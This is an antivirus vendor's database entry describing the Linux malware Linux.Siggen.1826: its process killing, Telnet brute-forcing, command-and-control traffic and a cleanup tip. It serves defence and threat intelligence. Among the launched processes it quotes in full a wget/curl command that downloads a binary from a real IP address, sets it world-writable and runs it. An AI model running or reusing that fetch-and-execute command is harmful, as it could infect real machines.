Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.1826

Added to the Dr.Web virus database: 2019-06-10

Virus description added:

Technical Information

Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
  • geadooodoeddnddDALo
Launches processes:
  • sh -c wget http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 wget.x86; curl -O http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 curl.x86;
  • wget http://185.244.25.160/hahdshd73ahshds73/ugei1
  • chmod 777 run.sh stdout.log ugei1
  • ./ugei1 wget.x86
  • chmod 777 run.sh stdout.log
  • ./ugei1 curl.x86
Kills system processes:
  • sshd
Kills the following processes:
  • exim4
  • bash
  • run.sh
  • /root/ugei1
Performs operations with the file system:
Modifies file access rights:
  • /root/run.sh
  • /root/ugei1
Creates or modifies files:
  • /root/ugei1
Deletes files:
  • /root/ugei1
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:17110
Establishes connection:
  • 8.#.8.8:53
  • 18#.##4.25.160:6574
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • 18#.###.##.160/hahdshd73ahshds73/ugei1
Sends data to the following servers:
  • 18#.##4.25.160:6574
Receives data from the following servers:
  • 18#.##4.25.160:6574

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number